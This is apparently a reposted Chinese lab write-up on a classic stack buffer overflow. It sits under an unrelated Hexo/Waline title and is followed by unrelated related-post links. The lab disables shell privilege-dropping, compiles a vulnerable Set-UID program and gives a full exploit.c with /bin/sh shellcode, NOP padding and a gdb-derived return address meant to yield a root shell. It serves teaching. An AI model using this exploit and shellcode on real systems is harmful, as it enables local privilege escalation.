2. 程式人生 > 其它 >Hexo+NexT8.1+Waline踩坑記錄

Hexo+NexT8.1+Waline踩坑記錄

阿新 發佈:2022-12-06

緩衝區溢位漏洞實驗

1. 實驗原理

  • 緩衝區溢位是指程式試圖向緩衝區寫入超出預分配固定長度資料的情況。這一漏洞可以被惡意使用者利用來改變程式的流控制,甚至執行程式碼的任意片段。這一漏洞的出現是由於資料緩衝器和返回地址的暫時關閉,溢位會引起返回地址被重寫。

2.實驗準備

  • 系統使用者名稱 shiyanlou
  • 實驗樓提供的是 64 位 Ubuntu linux,而本次實驗為了方便觀察彙編語句,我們需要在 32 位環境下作操作,因此實驗之前需要做一些準備。
  • 注意gdb的安裝,實驗樓中沒有Python的安裝包
  1. sudo apt-get update
  2. sudo apt-get install -y lib32z1 libc6-dev-i386 lib32readline6-dev
  3. sudo apt-get install -y gdb

3.開始實驗

  • 初始化設定
    sudo su
    cd /bin
    rm sh
    ln -s zsh sh
    exit
    1、Ubuntu 和其他一些 Linux 系統中,使用地址空間隨機化來隨機堆(heap)和棧(stack)的初始地址,這使得猜測準確的記憶體地址變得十分困難,而猜測記憶體地址是緩衝區溢位攻擊的關鍵。因此本次實驗中,我們使用以下命令關閉這一功能:

    2、此外,為了進一步防範緩衝區溢位攻擊及其它利用 shell 程式的攻擊,許多shell程式在被呼叫時自動放棄它們的特權。因此,即使你能欺騙一個 Set-UID 程式呼叫一個 shell,也不能在這個 shell 中保持 root 許可權,這個防護措施在 /bin/bash 中實現。
    linux 系統中,/bin/sh 實際是指向 /bin/bash 或 /bin/dash 的一個符號連結。為了重現這一防護措施被實現之前的情形,我們使用另一個 shell 程式(zsh)代替 /bin/bash。下面的指令描述瞭如何設定 zsh 程式:
    sudo su
    cd /bin
    rm sh
    ln -s zsh sh
    exit

    3、輸入命令 linux32 進入32位linux環境。此時你會發現,命令列用起來沒那麼爽了,比如不能tab補全了,輸入 /bin/bash 使用bash:
  • ** 漏洞程式**
在 /tmp 目錄下新建一個 stack.c 檔案:

cd /tmp
vim stack.c

stack.c,通過程式碼可以知道,程式會讀取一個名為“badfile”的檔案,並將檔案內容裝入“buffer”。

(程式碼如下)

點選檢視程式碼
/* stack.c */
 
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
 
int bof(char *str)
{
    char buffer[12];
 
    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);
 
    return 1;
}
 
int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;
 
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
 
    printf("Returned Properly\n");
    return 1;
}
  • 編譯該程式,並設定 SET-UID。命令如下:

sudo su

gcc -m32 -g -z execstack -fno-stack-protector -o stack

stack.c

chmod u+s stack

exit

  • 攻擊程式
    目的是攻擊剛才的漏洞程式,並通過攻擊獲得 root 許可權。在 /tmp 目錄下新建一個 exploit.c 檔案,輸入如下內容:
點選檢視程式碼
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
 
char shellcode[] =
    "\x31\xc0" //xorl %eax,%eax
    "\x50"     //pushl %eax
    "\x68""//sh" //pushl $0x68732f2f
    "\x68""/bin"     //pushl $0x6e69622f
    "\x89\xe3" //movl %esp,%ebx
    "\x50"     //pushl %eax
    "\x53"     //pushl %ebx
    "\x89\xe1" //movl %esp,%ecx
    "\x99"     //cdq
    "\xb0\x0b" //movb $0x0b,%al
    "\xcd\x80" //int $0x80
    ;
 
void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
 
    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);
 
    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");   //在buffer特定偏移處起始的四個位元組覆蓋sellcode地址  
    strcpy(buffer + 100, shellcode);   //將shellcode拷貝至buffer,偏移量設為了 100
 
    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

現在我們要得到 shellcode 在記憶體中的地址,輸入命令進入 gdb 除錯:

gdb stack

disass main

esp 中就是 str 的起始地址,所以我們在地址 0x080484ee 處設定斷點。

(我自己實際進行操作後得出的地址為ffffd4b0)
經過計算後得出答案

自己進行修改時為將“x??\x??\x??\x??”改為“x14\xd5\xff\xff”

  • 攻擊結果

先執行攻擊程式 exploit,再執行漏洞程式 stack,觀察結果:

相關推薦

Hexo+NexT8.1+Waline記錄

說明:由於NexT8.1.0移除了對valine的內建支援,轉而使用waline。在配置的過程中的一些

.net core 3.1在iis上釋出的記錄

前言 寫這篇文章的目的是希望像我一樣喜歡.net 的人在釋出 core到 iis上時少走點彎路

.Net Core WebApi(三)--使用 IdentityServer4 4.1.1 記錄

目的:建立IdentityServer 並通過PostMan驗證獲取token 第一次配置如下 public class Config

mmdetection記錄 error: command 'g++' failed with exit status 1

最近在搭建一個基於基於mmdetection的一個環境,遇到了各種gcc g++問題: 1.\'\'ImportError: ***/miniconda3/envs/open-mmlab/lib/python3.7/site-packages/torch/../../../libstdc++.so.6: version `CXXABI_1.3.11

Spark記憶體模型介紹及Spark應用記憶體優化記錄

Spark作為一個基於記憶體的分散式計算引擎,其記憶體管理模組在整個系統中扮演著非常重要的角色。理解Spark記憶體管理的基本原理,有助於更好的開發Spark應用程式和進行效能調優。同時,有效率的記憶體使用是Spark應

SQL Server在AlwaysOn中使用記憶體表的“記錄

前言 最近因為線上alwayson環境的一個數據庫上使用記憶體表。經過大概一個星期監控程式發現了一個非常嚴重問題這個資料庫的日誌檔案不會截斷,已用空間一直在增加(存在定時的每個小時的日誌備份),同時記憶體表資料

詳解Spring的StringUtils記錄

起因 最近在寫CRUD的時候,發現有個分頁的VO寫的健壯性比較差,一時手癢改了一下,沒想到改了之後好幾個功能都出現了問題。

windows下create-react-app 升級至3.3.1版本

電腦原先使用npm install -g create-react-app命令全域性安裝過,根據文件先全域性解除安裝npm uninstall -g create-react-app,然後採用npx create-react-app my-app建立專案。然而,專案建立完後,卻只生成了nod

Windows使用docker記錄

一.安裝 安裝時會讓你選擇:是否使用Windows容器 Use Windows containers instead of Linux containers(this can be changed after installation(使用Windows容器而不是Linux容器(這可以在安裝後更改))

MyBatis入門記錄

MyBatis入門程式 問題說明 學習過程中遇到很多問題,記錄一下。 Maven靜態資源過濾問題

spring boot swagger2 介面多版本控制記錄

引入包: <!--swagger--> <dependency> <groupId>io.springfox</groupId> <artifactId>springfox-swagger2</artifactId>

關於exceljs的資料有效性驗證記錄

最近公司的專案中,需要有下載 excel 模板的功能,這個模板需要在輸入時進行有效性判斷。我當時聽到需求時渾身一震,心想:這都是啥玩意啊 excel 輸入限制是啥啊???在詢問一番該功能的必要性之後,便開始了檢視文

部分瀏覽器 set-cookie 不成功記錄

事件起因: 公司正在做一個sso的單點登入的專案,做完之後,在測試階段,不同的終端的相容測試時候,好幾個不同的瀏覽器出現了不同的問題,有登入之後自動退出,有登陸不成功等問題。

Vue scope 記錄

Vue scope 記錄 今天在寫Vue元件的時候,遇到了一個,以為自己程式碼寫錯了,或是因為CSS的權重問題,排查了一個小時,最後發現原來是自己對Vue的細節不熟悉,沒有看出來。

Vue scoped 記錄

Vue scope 記錄 今天在寫Vue元件的時候,遇到了一個,以為自己程式碼寫錯了,或是因為CSS的權重問題,排查了一個小時,最後發現原來是自己對Vue的細節不熟悉,沒有看出來。

echart 記錄

問題一 1、需求: 有兩個選項:顯示標記點、顯示標籤。使用者可勾選這兩個選項設定這兩項。

Scheduler記錄

Spring 啟動報錯 :java.lang.IllegalStateException: Cannot run without an instance id org.springframework.beans.factory.BeanCreationException: Error creating bean with name \'quartzScheduler\' defined

dockerfile檔案構建映象記錄

1、Docker映象拉取錯誤碼: C:\\Users\\Administrator>docker pull mysql:5.7 5.7: Pulling from library/mysql

Spring入門記錄

記錄一下學習Spring時的經驗。 Jdk8不相容Spring4.x以下版本 入門三天,我一直被這控制檯一片紅苦惱著。

Nacos 記錄

Nacos 啟動報錯 版本 1.3.1 Caused by: com.alibaba.nacos.api.exception.NacosException: java.net.UnknownHostException: jmenv.tbsite.net